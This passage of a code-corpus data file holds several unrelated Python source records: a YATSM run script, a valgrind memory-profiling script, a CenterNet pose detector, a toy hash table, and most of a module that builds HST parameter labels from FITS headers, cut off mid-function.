OSError as e:\n        # File exists\n        if e.errno == 17:\n            pass\n        elif e.errno == 13:\n            print('Error - cannot create output directory {d}'.format(\n                d=dataset_config['output']))\n            print(e.strerror)\n            sys.exit(1)\n\n    # Test write capability\n    if not os.access(dataset_config['output'], os.W_OK):\n        print('Error - cannot write to output directory {d}'.format(\n            d=dataset_config['output']))\n        sys.exit(1)\n\n    # Test existence of cache directory\n    read_cache, write_cache = test_cache(dataset_config)\n\n    # Run YATSM\n    logger.info('Job {i} / {n} - using config file {f}'.format(\n        i=job_number, n=total_jobs, f=config_file))\n    main(dataset_config, yatsm_config,\n         check=check, resume=resume,\n         do_not_run=do_not_run,\n         read_cache=read_cache, write_cache=write_cache,\n         validate_cache=check_cache)\n","sub_path":"scripts/line_yatsm.py","file_name":"line_yatsm.py","file_ext":"py","file_size_in_byte":16516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"270539246","text":"import msparser\nimport os\nimport signal\nimport subprocess\nimport sys\nimport time\nfrom tabulate import tabulate\n\nagent_sp = subprocess.Popen([\"./install/bin/agent-profiling\"], shell=True)\ntime.sleep(1)\nsub_sp = subprocess.Popen([\"./install/bin/subscriber-profiling 1 topic_name\"], shell=True)\npub_sp = subprocess.Popen((\"valgrind --tool=massif --stacks=yes --detailed-freq=1 --max-snapshots=300 --threshold=1.0 --massif-out-file=./massif-publisher.out ./install/bin/publisher-profiling 2 topic_name 8\").split(), shell=False)\n\ntime.sleep(5)\n\npub_sp.send_signal(signal.SIGINT)\nsub_sp.terminate()\nagent_sp.terminate()\ntime.sleep(1)\n\nstd_heap_usage = 0\ndata = msparser.parse_file('massif-publisher.out')\npeak_index = data['peak_snapshot_index']\npeak_snapshot = data['snapshots'][peak_index]\nfor c in peak_snapshot['heap_tree']['children']:\n    if c['details'] and c['details']['function'] == '???':\n        std_heap_usage = 
c['nbytes']\n\nstack_usage = round((peak_snapshot['mem_stack'] / 1000), 2)\nheap_usage = round((peak_snapshot['mem_heap'] / 1000), 2)\ntotal_usage = round(((peak_snapshot['mem_stack'] + peak_snapshot['mem_heap'] + peak_snapshot['mem_heap_extra'] - std_heap_usage) / 1000), 2)\n\nprint(\"stack usage: \", stack_usage)\nprint(\"heap usage: \", heap_usage)\nprint(\"total usage: \", total_usage)","sub_path":"test/profiling/publisher-profiling.py","file_name":"publisher-profiling.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"507980085","text":"import cv2\nimport numpy as np\nimport time\n\nimport sys\nsys.path.insert(0, \"/Users/guanghan.ning/Desktop/dev/CenterNet-Gluon/\")\n\nfrom external.nms import soft_nms_39\nfrom models.tensor_utils import flip_tensor, flip_lr_off, flip_lr\n\nfrom detectors.base_detector import BaseDetector\n\nfrom models.decoder import decode_centernet_pose\nfrom utils.post_process import multi_pose_post_process\nfrom mxnet import nd\n\n\nclass PoseDetector(BaseDetector):\n def __init__(self, opt):\n super(PoseDetector, self).__init__(opt)\n self.flip_idx = opt.flip_idx\n\n '''\n def process(self, images, return_time=False):\n output = self.model(images)[-1]\n # 0: hm, 1: wh, 2: hps, 3: reg, 4: hm_hp, 5:hp_offset\n output[0] = output[0].sigmoid()\n\n if self.opt.hm_hp and not self.opt.mse_loss:\n output[4] = output[4].sigmoid()\n\n reg = output[3] if self.opt.reg_offset else None\n hm_hp = output[4] if self.opt.hm_hp else None\n hp_offset = output[5] if self.opt.reg_hp_offset else None\n\n nd.waitall()\n forward_time = time.time()\n\n if self.opt.flip_test:\n output[0] = (output[0][0:1] + flip_tensor(output[0][1:2])) / 2\n output[1] = (output[1][0:1] + flip_tensor(output[1][1:2])) / 2\n output[2] = (output[2][0:1] + flip_lr_off(output[2][1:2], self.flip_idx)) / 2\n hm_hp = (hm_hp[0:1] + flip_lr(hm_hp[1:2], self.flip_idx)) / 2 if hm_hp is not None else None\n reg = reg[0:1] if reg is not None else None\n hp_offset = hp_offset[0:1] if hp_offset is not None else None\n\n dets = decode_centernet_pose(output[0], output[1], output[2], reg=reg, hm_hp=hm_hp, hp_offset=hp_offset, K=self.opt.K)\n\n if return_time:\n return output, dets, forward_time\n else:\n return output, dets\n '''\n def save_symbols(self, image_or_path_or_tensor, meta=None):\n load_time, pre_time, net_time, dec_time, post_time = 0, 0, 0, 0, 0\n merge_time, tot_time = 0, 0\n start_time = time.time()\n pre_processed = False\n if isinstance(image_or_path_or_tensor, np.ndarray):\n image = image_or_path_or_tensor\n elif type(image_or_path_or_tensor) == type (''):\n image = cv2.imread(image_or_path_or_tensor)\n else:\n image = image_or_path_or_tensor['image'][0].numpy()\n pre_processed_images = image_or_path_or_tensor\n pre_processed = True\n\n loaded_time = time.time()\n load_time += (loaded_time - start_time)\n\n detections = []\n for scale in self.scales:\n scale_start_time = time.time()\n if not pre_processed:\n images, meta = self.pre_process(image, scale, meta)\n else:\n images = pre_processed_images['images'][scale][0]\n meta = pre_processed_images['meta'][scale]\n meta = {k: v.numpy()[0] for k, v in meta.items()}\n\n images = images.as_in_context(self.ctx)\n\n\n dets = self.model(images)\n print(\"Saving symbols\")\n dets.save(\"symbol-detections.json\")\n return\n\n\n def process(self, images, return_time=False):\n print(\"images.shape\", images.shape)\n dets = self.model(images)\n print(\"dets.shape = \", 
dets.shape)\n        print(\"type: \", type(dets))\n        #nd.waitall()\n        forward_time = time.time()\n        if return_time:\n            return None, dets, forward_time\n        else:\n            return None, dets\n\n\n    def post_process(self, dets, meta, scale=1):\n        dets = dets.asnumpy()\n        dets = multi_pose_post_process(dets.copy(), [meta['c']], [meta['s']], meta['out_height'], meta['out_width'])\n\n        for j in range(1, self.num_classes + 1):\n            dets[0][j] = np.array(dets[0][j], dtype=np.float32).reshape(-1, 39)\n            dets[0][j][:, :4] /= scale\n            dets[0][j][:, 5:] /= scale\n        return dets[0]\n\n    def merge_outputs(self, detections):\n        results = {}\n        results[1] = np.concatenate([detection[1] for detection in detections], axis=0).astype(np.float32)\n        if self.opt.nms or len(self.opt.test_scales) > 1:\n            soft_nms_39(results[1], Nt=0.5, method=2)\n        results[1] = results[1].tolist()\n        return results\n","sub_path":"detectors/pose_detector_symbol_with_decoder.py","file_name":"pose_detector_symbol_with_decoder.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"624559453","text":"#encoding = utf-8\n\"\"\"\n@version:0.1\n@author: jorian\n@time: 2020/12/4 13:21\n\"\"\"\n\n\nclass hashtable(object):\n    def __init__(self):\n        self.items=[None]*100\n\n    def hash(self,a):\n        return a*1+1 # simple linear mapping from key to slot\n\n    def put(self,k,v):\n        # store the value in the slot given by the hash of the key\n        self.items[self.hash(k)] = v\n\n    def get(self,k):\n        hashcode=self.hash(k)\n        # read back the value from the slot given by the hash of the key\n        return self.items[hashcode]\n\nclass hashtable(object):\n    def __init__(self):\n        self.capacity = 10\n        self.hash_table = [[None, None]for i in 
range(self.capacity)]\n        self.num = 0\n        self.load_factor = 0.75\n\n    def hash(self, k, i):\n        h_value = (k+i) % self.capacity\n        if self.hash_table[h_value][0] == k:\n            return h_value\n        if self.hash_table[h_value][0] != None:\n            i = i+1\n            h_value = self.hash(k, i)\n        return h_value\n\n    def resize(self):\n        # grow the capacity to twice the current number of elements\n        self.capacity = self.num*2\n        temp = self.hash_table[:]\n        self.hash_table = [[None, None]for i in range(self.capacity)]\n        for i in temp:\n            # re-insert the elements that were already stored\n            if(i[0] != None):\n                hash_v = self.hash(i[0], 0)\n                self.hash_table[hash_v][0] = i[0]\n                self.hash_table[hash_v][1] = i[1]\n\n    def put(self, k, v):\n        hash_v = self.hash(k, 0)\n        self.hash_table[hash_v][0] = k\n        self.hash_table[hash_v][1] = v\n        # duplicate keys are not handled yet; left as a possible optimization\n        self.num = self.num+1\n        # resize once the fill ratio exceeds the load factor\n        if(self.num/len(self.hash_table) > self.load_factor):\n            self.resize()\n\n    def get(self, k):\n        hash_v = self.hash(k, 0)\n        return self.hash_table[hash_v][1]\n\n\ntable = hashtable()\nfor i in range(1, 13):\n    table.put(i, i)\nprint(table.get(3))\nprint(table.hash_table)","sub_path":"hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"113696563","text":"\"\"\"\nFunctionality to build an ```` XML element using a SQLite\ndatabase.\n\"\"\"\nimport julian\n\nfrom typing import Any, Dict, List, Tuple\n\nfrom pdart.labels.hst_parameters_xml import (\n    detector_id,\n    moving_target_description,\n    moving_target_keyword,\n    targeted_detector_id,\n    hst_parameters,\n    program_parameters,\n    instrument_parameters,\n    pointing_parameters,\n    tracking_parameters,\n    exposure_parameters,\n    wavelength_filter_grating_parameters,\n    operational_parameters,\n)\nfrom pdart.labels.lookup import Lookup, merge_two_hdu_lookups\nfrom pdart.xml.templates import (\n    FragBuilder,\n    NodeBuilder,\n    NodeBuilderTemplate,\n    combine_nodes_into_fragment,\n)\n\nWFPC2_DETECTOR_IDS = {1: \"PC1\", 2: \"WF2\", 3: \"WF3\", 4: \"WF4\"}\n# All functions have the same input arguments:\n#    data_lookups: List[Lookup]\n#        a list of all the FITS headers in a data file (raw, d0f, drz, etc.)\n#    shm_lookup: Lookup\n#        the first fits header of the associated _shm.fits file\n#        or _spt.fits file.\n# The second argument is needed because sometimes the data file does not contain\n# all the info we need.\n\n\ndef fname(lookup: Lookup) -> str:\n    \"\"\"\n    Not used as an attribute but needed for error messages\n    \"\"\"\n    try:\n        return lookup[\"FILENAME\"].strip()\n    except KeyError:\n        pass\n    # GHRS, at least, does not contain FILENAME, but ROOTNAME is good enough\n    return lookup[\"ROOTNAME\"].strip().lower() + \"x_xxx.fits\"\n\n\n##############################\n# get_aperture_name\n##############################\ndef get_aperture_name(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n    \"\"\"\n    Return text for the ```` XML element.\n    \"\"\"\n    instrument = get_instrument_id(data_lookups, shm_lookup)\n    if instrument in (\"WF/PC\", \"WFPC2\", \"HSP\"):\n        return shm_lookup[\"APER_1\"].strip()\n    if instrument == \"FOS\":\n        return shm_lookup[\"APER_ID\"]\n    # This is valid for most instruments\n    try:\n        return data_lookups[0][\"APERTURE\"].strip()\n    except KeyError:\n        pass\n    raise ValueError(\"missing aperture for \" + fname(shm_lookup))\n\n\n##############################\n# get_bandwidth\n##############################\ndef get_bandwidth(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n    \"\"\"\n    Return a float for the ```` XML element.\n    \"\"\"\n    lookup = 
merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n    # Works for STIS and WFPC2\n    try:\n        return \"%.4f\" % (float(lookup[\"BANDWID\"]) * 1.0e-4)\n    except KeyError:\n        return \"0.\"\n\n\n##############################\n# get_binning_mode\n##############################\ndef get_binning_mode(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n    \"\"\"\n    Return text for the ```` XML element.\n    \"\"\"\n    lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n    instrument = get_instrument_id(data_lookups, shm_lookup)\n    # WF/PC and WFPC2 are special cases\n    if instrument in (\"WF/PC\", \"WFPC2\"):\n        obsmode = lookup[\"MODE\"].strip()\n        if obsmode == \"FULL\":\n            return \"1\"\n        else: # obsmode == \"AREA\"\n            return \"2\"\n    # Binning info can be in the first or second FITS header\n    for lookup in data_lookups[:2]:\n        try:\n            binaxis1 = lookup[\"BINAXIS1\"]\n            binaxis2 = lookup[\"BINAXIS2\"]\n            return str(max(binaxis1, binaxis2))\n        except KeyError:\n            pass\n    return \"1\"\n\n\n##############################\n# get_center_filter_wavelength\n##############################\ndef get_center_filter_wavelength(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n    \"\"\"\n    Return a float for the ```` XML element.\n    \"\"\"\n    lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n    # Works for STIS and WFPC2\n    try:\n        return \"%.4f\" % (float(lookup[\"CENTRWV\"]) * 1.0e-4)\n    except KeyError:\n        return \"0.\"\n\n\n##############################\n# get_channel_id\n##############################\ndef get_channel_id(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n    \"\"\"\n    Return text for the ```` XML element.\n    \"\"\"\n    lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n    instrument = get_instrument_id(data_lookups, shm_lookup)\n    if instrument == \"NICMOS\":\n        result = \"NIC\" + str(lookup[\"CAMERA\"])\n    elif instrument == \"WF/PC\":\n        result = lookup[\"CAMERA\"].strip()\n    else:\n        try:\n            ccd = lookup[\"DETECTOR\"]\n            if instrument == \"WFPC2\":\n                # WFPC2's DETECTOR keyword holds the numeric chip id (1-4);\n                # calling .strip() on it would fail, so convert to int instead\n                return WFPC2_DETECTOR_IDS[int(ccd)]\n            else:\n                return str(ccd).strip()\n        except KeyError:\n            result = instrument\n\n    return result\n\n\n##############################\n# get_coronagraph_flag\n##############################\ndef get_coronagraph_flag(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n    \"\"\"\n    Return text for the ```` XML element.\n    \"\"\"\n    instrument = get_instrument_id(data_lookups, shm_lookup)\n    aperture = get_aperture_name(data_lookups, shm_lookup)\n    if instrument == \"ACS\":\n        if aperture.startswith(\"HRC-CORON\") or aperture.startswith(\"HRC-OCCULT\"):\n            return \"true\"\n    if instrument == \"STIS\":\n        if (\n            aperture == \"50CORON\"\n            or aperture.startswith(\"BAR\")\n            or aperture.startswith(\"WEDGE\")\n            or aperture.startswith(\"52X0.2F1\")\n        ):\n            return \"true\"\n    if instrument == \"NICMOS\":\n        if aperture == \"NIC2-CORON\":\n            return \"true\"\n    return \"false\"\n\n\n##############################\n# get_cosmic_ray_split_count\n##############################\ndef get_cosmic_ray_split_count(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n    \"\"\"\n    Return text for the ```` XML element.\n    \"\"\"\n    lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n    try:\n        return str(lookup[\"CRSPLIT\"])\n    except KeyError:\n        return \"1\" # no CR-splitting unless explicitly stated\n\n\n##############################\n# get_detector_ids\n##############################\n\n\ndef get_detector_ids(data_lookups: List[Lookup], shm_lookup: Lookup) -> List[str]:\n    \"\"\"\n    Return a list of zero or more text values for the 
````\n XML elements.\n \"\"\"\n # Interior function\n def get_ccds_from_lookups(data_lookups: List[Lookup], fitsname: str) -> List[int]:\n ccds: List[int] = []\n for lookup in data_lookups:\n try:\n ccdchip = int(lookup[fitsname])\n ccds.append(ccdchip)\n except KeyError:\n pass\n ccds = list(set(ccds)) # select unique values\n ccds.sort()\n return ccds\n\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n channel = get_channel_id(data_lookups, shm_lookup)\n if instrument == \"ACS\" and channel == \"WFC\":\n ccds = get_ccds_from_lookups(data_lookups, \"CCDCHIP\")\n if -999 in ccds:\n ccds = [1, 2]\n result = [f\"WFC{k}\" for k in ccds]\n elif instrument == \"COS\" and channel == \"FUV\":\n segment = lookup[\"SEGMENT\"].strip()\n if segment not in (\"FUVA\", \"FUVB\", \"BOTH\"):\n raise ValueError(\n \"unrecognized segment (%s) in %s\" % (segment, fname(lookup))\n )\n if segment == \"FUVA\":\n result = [\"FUVA\"]\n elif segment == \"FUVB\":\n result = [\"FUVB\"]\n else:\n result = [\"FUVA\", \"FUVB\"]\n elif instrument == \"GHRS\":\n result = [\"GHRS\" + str(lookup[\"DETECTOR\"])]\n elif instrument == \"HSP\":\n config = shm_lookup[\"CONFIG\"].strip()\n # Example: config = HSP/UNK/VIS\n parts = config.split(\"/\")\n if parts[0] != \"HSP\":\n raise ValueError(f\"Invalid CONFIG value in {fname(lookup)}.\")\n result = [p for p in parts[1:] if p != \"UNK\"]\n elif instrument == \"WFC3\" and channel == \"UVIS\":\n ccds = get_ccds_from_lookups(data_lookups, \"CCDCHIP\")\n if -999 in ccds:\n ccds = [1, 2]\n result = [f\"UVIS{k}\" for k in ccds]\n elif instrument == \"WF/PC\":\n # We will need to find a workaround to read the FITS table from the data\n # file, because that is the only way to get the actual set of detectors\n # if there are less than four! 
I hope it just doesn't come up.\n count = lookup[\"NAXIS3\"]\n if count != 4:\n raise ValueError(\n \"unknown detector subset in (%d/4) in %s\" % (count, fname(lookup))\n )\n if channel not in (\"PC\", \"WFC\"):\n raise ValueError(f\"Bad channel for {fname(lookup)}.\")\n if channel == \"WFC\":\n result = [\"WF1\", \"WF2\", \"WF3\", \"WF4\"]\n else:\n result = [\"PC5\", \"PC6\", \"PC7\", \"PC8\"]\n elif instrument == \"WFPC2\":\n ccds = get_ccds_from_lookups(data_lookups, \"DETECTOR\")\n result = [WFPC2_DETECTOR_IDS[k] for k in ccds]\n # Otherwise, return the single value of channel_id\n else:\n result = [channel]\n\n return result\n\n\n##############################\n# get_exposure_duration\n##############################\ndef get_exposure_duration(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return a float for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n return str(lookup[\"EXPTIME\"])\n except KeyError:\n return str(lookup[\"TEXPTIME\"])\n\n\n##############################\n# get_exposure_type\n##############################\ndef get_exposure_type(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n return lookup[\"EXPFLAG\"].strip()\n\n\n##############################\n# get_filter_name\n##############################\ndef get_filter_name(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n if instrument == \"ACS\":\n filter1 = lookup[\"FILTER1\"].strip()\n filter2 = lookup[\"FILTER2\"].strip()\n if filter1.startswith(\"CLEAR\"):\n if filter2.startswith(\"CLEAR\") or filter2 == \"N/A\":\n return \"CLEAR\"\n else:\n return filter2\n if filter2.startswith(\"CLEAR\") or filter2 == \"N/A\":\n return filter1\n # At this point, both filters start with \"F\" followed by three digits,\n # or \"POL\" for polarizers. 
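A hypothetical\n        # example: FILTER1=\"F606W\" with FILTER2=\"POL0V\" joins to \"F606W+POL0V\". 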
Sort by increasing wavelength; put\n # polarizers second; join with a plus.\n filters = [filter1, filter2]\n filters.sort()\n return \"+\".join(filters)\n if instrument == \"FOC\":\n filters = [\n lookup[\"FILTER1\"].strip(),\n lookup[\"FILTER2\"].strip(),\n lookup[\"FILTER3\"].strip(),\n lookup[\"FILTER4\"].strip(),\n ]\n filters = [f for f in filters if not f.startswith(\"CLEAR\")]\n filters.sort()\n return \"+\".join(filters)\n if instrument in (\"FOS\", \"HSP\"):\n return shm_lookup[\"SPEC_1\"].strip()\n if instrument == \"GHRS\":\n return lookup[\"GRATING\"].strip()\n if instrument == \"STIS\":\n opt_elem = lookup[\"OPT_ELEM\"].strip()\n filter = lookup[\"FILTER\"].strip().upper().replace(\" \", \"_\")\n if filter == \"CLEAR\":\n return opt_elem\n else:\n return opt_elem + \"+\" + filter\n if instrument in (\"WF/PC\", \"WFPC2\"):\n filtnam1 = lookup[\"FILTNAM1\"].strip()\n filtnam2 = lookup[\"FILTNAM2\"].strip()\n if filtnam1 == \"\":\n return filtnam2\n if filtnam2 == \"\":\n return filtnam1\n # At this point, both filters start with \"F\", followed by three digits.\n # Put lower value first; join with a plus.\n filters = [filtnam1, filtnam2]\n filters.sort()\n return \"+\".join(filters)\n # For other instruments there is just zero or one filter\n try:\n return lookup[\"FILTER\"].strip()\n except KeyError:\n return \"Not applicable\"\n\n\n##############################\n# get_fine_guidance_sensor_lock_type\n##############################\ndef get_fine_guidance_sensor_lock_type(\n data_lookups: List[Lookup], shm_lookup: Lookup\n) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n return lookup[\"FGSLOCK\"].strip()\n\n\n##############################\n# get_gain_setting\n##############################\ndef get_gain_setting(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n # Works for WFPC2\n try:\n wfpc2_gain: int = int(float(lookup[\"ATODGAIN\"])) # format WFPC2 gains as ints\n # Need to specifically check this to avoid causing issues on STIS/NUV-MAMA\n if instrument == \"WFPC2\":\n if wfpc2_gain in (7, 15):\n return str(wfpc2_gain)\n raise ValueError(\n \"unrecognized WFPC2 gain (%d) in %s\" % (wfpc2_gain, fname(lookup))\n )\n else:\n # For STIS/NUV-MAMA\n return str(wfpc2_gain)\n except KeyError:\n pass\n # Works for ACS, WFC3, others\n try:\n gain: float = float(lookup[\"CCDGAIN\"])\n return \"%3.1f\" % gain # format other gains with one decimal\n except KeyError:\n pass\n return \"0.\"\n\n\n##############################\n# get_gyroscope_mode\n##############################\ndef get_gyroscope_mode(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n return str(lookup[\"GYROMODE\"]).strip().replace(\"T\", \"3\")\n except KeyError:\n return \"3\" # Three-gyro mode unless otherwise specified\n\n\n##############################\n# get_hst_pi_name\n##############################\ndef get_hst_pi_name(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n # Usually in the first FITS header, but in the shm header for GHRS\n for lookup in (data_lookups[0], shm_lookup):\n try:\n pr_inv_l = lookup[\"PR_INV_L\"].strip()\n 
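# PR_INV_M (the PI's middle name or initial) may be absent from the\n            # headers, hence the nested try/except just below.\n            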
pr_inv_f = lookup[\"PR_INV_F\"].strip()\n try:\n pr_inv_m = lookup[\"PR_INV_M\"].strip()\n except KeyError:\n pr_inv_m = \"\"\n return f\"{pr_inv_l}, {pr_inv_f} {pr_inv_m}\".strip()\n except KeyError:\n pass\n raise ValueError(\"missing PR_INV_L in \" + fname(data_lookups[0]))\n\n\n##############################\n# get_hst_proposal_id\n##############################\ndef get_hst_proposal_id(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ``<hst_proposal_id>`` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n return str(lookup[\"PROPOSID\"])\n\n\n##############################\n# get_hst_target_name\n##############################\ndef get_hst_target_name(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ``<hst_target_name>`` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n return lookup[\"TARGNAME\"]\n\n\n##############################\n# get_instrument_id\n##############################\ndef get_instrument_id(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ``<instrument_id>`` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = lookup[\"INSTRUME\"].strip()\n if instrument == \"HRS\":\n return \"GHRS\"\n if instrument == \"WFPC\":\n return \"WF/PC\"\n return instrument\n\n\n##############################\n# get_instrument_mode_id\n##############################\ndef get_instrument_mode_id(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ``<instrument_mode_id>`` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n instrument = get_instrument_id(data_lookups, shm_lookup)\n if instrument in (\"WF/PC\", \"WFPC2\"):\n return lookup[\"MODE\"].strip()\n if instrument == \"FOC\":\n return lookup[\"OPTCRLY\"].strip()\n if instrument == \"HSP\":\n return shm_lookup[\"OPMODE\"].strip()\n # For most HST instruments, this should work...\n try:\n return lookup[\"OBSMODE\"].strip()\n except KeyError:\n pass\n raise ValueError(\"instrument_mode_id not found for \" + fname(lookup))\n\n\n##############################\n# get_mast_observation_id\n##############################\ndef get_mast_observation_id(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ``<mast_observation_id>`` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n KEYS = [\"ROOTNAME\", \"ASN_ID\"]\n for keyword in KEYS:\n try:\n return lookup[keyword].strip().lower()\n except KeyError:\n pass\n\n raise RuntimeError(f\"lookup = {lookup}, shm_lookup = {shm_lookup}\")\n\n\n##############################\n# get_moving_target_descriptions\n##############################\ndef get_moving_target_descriptions(\n data_lookups: List[Lookup], shm_lookup: Lookup\n) -> List[str]:\n \"\"\"\n Return text for the ``<moving_target_description>`` XML element.\n \"\"\"\n # Defined by \"MT_LV_n\" keyword values in the _shm.fits files\n descs = []\n for k in range(1, 10):\n keyword = \"MT_LV_\" + str(k)\n try:\n value = shm_lookup[keyword].strip()\n descs.append(value)\n except KeyError:\n break\n if descs:\n return descs\n else:\n return [\"Not applicable\"]\n\n\n##############################\n# get_moving_target_keywords\n##############################\ndef get_moving_target_keywords(\n data_lookups: List[Lookup], shm_lookup: Lookup\n) -> List[str]:\n \"\"\"\n Return text for the ``<moving_target_keyword>`` XML element.\n \"\"\"\n # Defined by \"TARKEYn\" keyword values in the _shm.fits files\n keywords 
= []\n for k in range(1, 10):\n keyword = \"TARKEY\" + str(k)\n try:\n value = shm_lookup[keyword].strip()\n keywords.append(value)\n except KeyError:\n break\n if keywords:\n return keywords\n else:\n return [\"Not applicable\"]\n\n\n##############################\n# get_moving_target_flag\n##############################\ndef get_moving_target_flag(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n # Usually in the first FITS header, but in the shm header for GHRS\n for lookup in (data_lookups[0], shm_lookup):\n try:\n value = lookup[\"MTFLAG\"].strip()\n if value in (\"T\", \"1\"):\n return \"true\"\n if value in (\"F\", \"\", \"0\"):\n return \"false\"\n else:\n raise ValueError(\n f\"unrecognized MTFLAG value ({value}: {type(value)}) for {fname(data_lookups[0])}\"\n )\n except KeyError:\n pass\n raise ValueError(\"missing MTFLAG value for %s\" % fname(data_lookups[0]))\n\n\n##############################\n# get_observation_type\n##############################\ndef get_observation_type(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n obstype = lookup[\"OBSTYPE\"].strip()\n if obstype not in (\"IMAGING\", \"SPECTROGRAPHIC\"):\n obstype = \"\"\n except KeyError:\n obstype = \"\"\n if not obstype:\n instrument = get_instrument_id(data_lookups, shm_lookup)\n if instrument in (\"ACS\", \"NICMOS\", \"WFC3\", \"WF/PC\", \"WFPC2\"):\n obstype = \"IMAGING\"\n elif instrument in (\"COS\", \"FOS\", \"GHRS\"):\n obstype = \"SPECTROGRAPHIC\"\n elif instrument == \"HSP\":\n obstype = \"TIME-SERIES\"\n else:\n raise ValueError(\"missing OBSTYPE in \" + fname(lookup))\n return obstype\n\n\n##############################\n# get_proposed_aperture_name\n##############################\ndef get_proposed_aperture_name(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n res = lookup[\"PROPAPER\"].strip() # only a few instruments distinguish\n if res:\n return res\n else:\n return get_aperture_name(data_lookups, shm_lookup)\n except KeyError:\n return get_aperture_name(data_lookups, shm_lookup)\n\n\n##############################\n# get_repeat_exposure_count\n##############################\ndef get_repeat_exposure_count(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n try:\n return str(lookup[\"NRPTEXP\"])\n except KeyError:\n return \"1\"\n\n\n##############################\n# get_plate_scale\n##############################\nPLATE_SCALES = { # plate scales in arcsec/pixel\n (\"ACS\", \"HRC\"): 0.026,\n (\"ACS\", \"SBC\"): 0.032,\n (\"ACS\", \"WFC1\"): 0.05,\n (\"ACS\", \"WFC2\"): 0.05,\n (\"FOC\", \"FOC\"): 0.014,\n (\"NICMOS\", \"NIC1\"): 0.042,\n (\"NICMOS\", \"NIC2\"): 0.075,\n (\"NICMOS\", \"NIC3\"): 0.2,\n (\"WF/PC\", \"WFC\"): 0.1016,\n (\"WF/PC\", \"PC\"): 0.0439,\n (\"WFPC2\", \"PC1\"): 0.046,\n (\"WFPC2\", \"WF2\"): 0.1,\n (\"WFPC2\", \"WF3\"): 0.1,\n (\"WFPC2\", \"WF4\"): 0.1,\n}\n\n\ndef get_plate_scale(data_lookups: List[Lookup], shm_lookup: Lookup) -> str:\n \"\"\"\n Return text for the ```` XML element.\n \"\"\"\n lookup = merge_two_hdu_lookups(data_lookups[0], data_lookups[1])\n # Works for STIS\n try:\n return 
